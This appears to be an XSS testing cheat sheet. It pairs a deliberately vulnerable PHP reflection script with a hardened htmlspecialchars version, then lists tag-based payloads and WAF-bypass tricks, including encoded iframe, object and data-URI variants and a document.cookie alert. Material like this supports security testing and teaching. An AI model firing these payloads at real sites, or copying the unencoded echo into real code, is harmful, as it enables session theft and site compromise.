Test code:
<?php
// Reflected XSS vulnerability
// 1. A variable is echoed directly, without any output encoding
echo $_GET['XSS'];
?>
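Added here as a hardened counterpart to the test script above (it is not part of the original page): the same reflection of the `XSS` parameter, but passed through htmlspecialchars() so the browser renders the input as text instead of parsing it as a tag or attribute. The self-check function runs a few of the tag payloads listed further down this page as constructed sample inputs; the function names are my own.

```php
<?php
// Added example, not from the original page: hardened version of
//     echo $_GET['XSS'];
// Output is HTML-encoded for the HTML body/attribute context only.
declare(strict_types=1);

function encodeForHtml(string $value): string
{
    // ENT_QUOTES encodes both " and ' ; ENT_SUBSTITUTE replaces invalid UTF-8
    // instead of returning an empty string; the charset is stated explicitly
    // so the encoder and the browser agree on what a byte sequence means.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened reflection: missing or non-string parameters become an empty string.
function reflectParameter(array $get, string $key = 'XSS'): string
{
    $raw = (isset($get[$key]) && is_string($get[$key])) ? $get[$key] : '';
    return encodeForHtml($raw);
}

// Self-check over constructed inputs taken from the payload list on this page.
// PHP has already URL-decoded $_GET, so the %3d-style variants end up here too.
function payloadsAreNeutralised(): bool
{
    $payloads = [
        '<audio src=x onerror=alert(47)>',
        '<button onfocus=alert(1) autofocus>',
        '<math><a/xlink:href=javascript:prompt(1)>Xss',
        '<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>',
        "<keygen onfocus=javascript:alert(1) autofocus>",
    ];
    foreach ($payloads as $p) {
        $out = reflectParameter(['XSS' => $p]);
        // After encoding, no raw angle bracket or quote may survive in the output.
        if (preg_match('/[<>"\']/', $out) === 1) {
            return false;
        }
    }
    return true;
}

if (PHP_SAPI === 'cli') {
    echo payloadsAreNeutralised() ? "all payloads neutralised\n" : "encoding failed\n";
} else {
    header('Content-Type: text/html; charset=UTF-8');
    header("Content-Security-Policy: default-src 'self'");
    echo reflectParameter($_GET);
}
```

htmlspecialchars() is only correct when the value lands in HTML text or a quoted attribute; a value reflected inside a script block, a URL or a CSS property needs the encoder for that context, and the CSP header limits the impact if an encoding step is missed.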
Tags
First test which tags are allowed through:
<script> <a> <p> <img> <body> <button> <var> <div> <iframe> <object> <input>
<textarea> <keygen> <frameset> <embed> <svg> <math> <video> <audio> <select>
Bypass methods
Functions that can pop a dialog: alert, prompt, confirm; base64 encoding and other encoding bypasses (Safedog does not filter these either)
There are many bypass methods, for example:
- Case variation
- javascript: pseudo-protocol
- No semicolon
- Flash
- New HTML5 tags
- Fuzz testing
- Nested (double-layer) tags
audio tag
<audio src=x onerror=alert(47)>
<audio src=x onerror=prompt(1);>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
video tag
<video src=x onerror=prompt(1);>
<video src=x onerror=alert(48)>
div tag
<div style="width:expression(alert(/1/))">1</div> (executes only in the IE browser)
<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv> (URL-encoding bypass)
math tag
<math><a/xlink:href=javascript:prompt(1)>Xss
<math href="javascript:javascript:alert(1)">Xss</math>
button tag
<button onfocus=alert(1) autofocus>
<button/onclick=alert(1) >xss</button>
keygen tag
<keygen/onfocus=prompt(1);>
<keygen onfocus=javascript:alert(1) autofocus>
object tag
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
base64-encoded: PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg
Decoded: <script>alert(1)</script>
iframe tag
<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>
<iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">
<iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>
This list is incomplete; more will be added when there is time.